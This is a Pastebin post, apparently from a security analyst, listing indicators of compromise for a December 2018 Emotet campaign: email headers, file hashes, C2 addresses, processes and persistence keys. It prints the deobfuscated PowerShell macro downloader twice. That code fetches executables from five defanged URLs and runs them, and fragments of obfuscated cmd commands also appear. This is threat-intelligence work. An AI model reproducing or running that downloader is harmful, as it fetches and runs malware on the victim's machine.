API tools faq
paste
Advertisement
VRad

#emotet_201218

VRad
Dec 23rd, 2018
797
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.17 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #emotet #feodo #W97M #powershell
  2.  
  3. https://pastebin.com/EejcbL4t
  4.  
  5. previous contact:
  6. 04/12/18 https://pastebin.com/znQDtbnt
  7. 09/11/18 https://pastebin.com/THHMs2wg
  8. 01/10/18 https://pastebin.com/Y6DnbpHv
  9.  
  10. FAQ:
  11. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
  12. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
  13.  
  14. attack_vector
  15. --------------
  16. email attach .doc > macro > cmd > powershell > GET 5 URL > %temp%\***.exe
  17.  
  18. email_headers
  19. --------------
  20. Received: from server.arroyo.bz (server.arroyo.bz [65.60.8.150])
  21. by srv8.victim1.com for <user0@org7.kv.victim1.com>;
  22. Thu, 20 Dec 2018 20:00:26 +0200 (EET)
  23. (envelope-from veronicat@mccell.com.mx)
  24. Received: from [138.122.96.73] (port=56726 helo=10.15.31.100)
  25. by server.arroyo.bz (Exim 4.91)
  26. for user0@org7.kv.victim1.com; Thu, 20 Dec 2018 12:00:07 -0600
  27. Date: Thu, 20 Dec 2018 12:00:40 -0600
  28. From: Вячеслав Прендзевский <prom@pride-ukraine.com.ua> <veronicat@mccell.com.mx>
  29. To: user0@org7.kv.victim1.com
  30. Subject: Вячеслав Прендзевский - Invoice 85841
  31.  
  32. files
  33. --------------
  34. SHA-256 bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80
  35. File name Inv85841.doc
  36. File size 144.5 KB
  37.  
  38. SHA-256 270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1
  39. File name pEakCmvuBiB.exe
  40. File size 536 KB
  41.  
  42. activity
  43. **************
  44.  
  45. deobfuscated_macro
  46. --------------
  47. powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
  48.  
  49. pl_src: 1/5
  50. --------------
  51. h11p:\ opewinsng {.}com/bOiANyEc 404
  52. h11p:\ chamanga {.} org {.}uy/eE9DiHE6 200
  53. h11p:\ ideagold {.}by/rzb6hSlC3 403
  54. h11p:\ onetechblog{.} tek1{.} top/MyZztFl 403
  55. h11p:\ maxclean{.} srv {.}br/QVtDDcAZ 404
  56.  
  57. C2:
  58. --------------
  59. http://189.226.214.129:8080/
  60.  
  61. netwrk
  62. --------------
  63. 1.22.119.250 1.22.119.250 GET / HTTP/1.1 Mozilla/4.0
  64.  
  65. comp
  66. --------------
  67.  
  68. stgintel.exe 2224 189.226.214.129 8080 SYN_SENT
  69. stgintel.exe 2224 200.124.225.32 80 SYN_SENT
  70. stgintel.exe 2224 70.80.135.35 8443 SYN_SENT
  71. stgintel.exe 2224 201.102.7.208 8443 SYN_SENT
  72. stgintel.exe 2224 189.222.245.247 80 SYN_SENT
  73. stgintel.exe 2224 1.22.119.250 80 ESTABLISHED
  74.  
  75. proc
  76. --------------
  77. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  78.  
  79. c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe /c %PrOgraMdatA:...
  80.  
  81. CmD /V: /R " seT gali=;'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008...
  82.  
  83. C:\Windows\system32\cmd.exe /S /D /c" EchO pow%PUBLIC:~5,1%r%SESSIONNAME:...
  84.  
  85. Cmd.EXe
  86.  
  87. powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
  88.  
  89. C:\tmp\583.exe
  90.  
  91. C:\Users\operator\AppData\Local\stgintel\stgintel.exe
  92.  
  93. persist
  94. --------------
  95. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 23.12.2018 13:19
  96. stgintel
  97. TortoisePlink http://tortoisesvn.net
  98. c:\users\operator\appdata\local\stgintel\stgintel.exe 22.12.2018 16:05
  99.  
  100. drop
  101. --------------
  102. C:\tmp\583.exe
  103. C:\Users\operator\AppData\Local\stgintel\stgintel.exe
  104.  
  105. VR
  106.  
  107. # # #
  108. https://www.virustotal.com/#/file/bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80/details
  109. https://www.virustotal.com/#/file/270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1/details
  110. https://analyze.intezer.com/#/analyses/9142da6d-ba72-4ff1-a515-5b187735a162
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!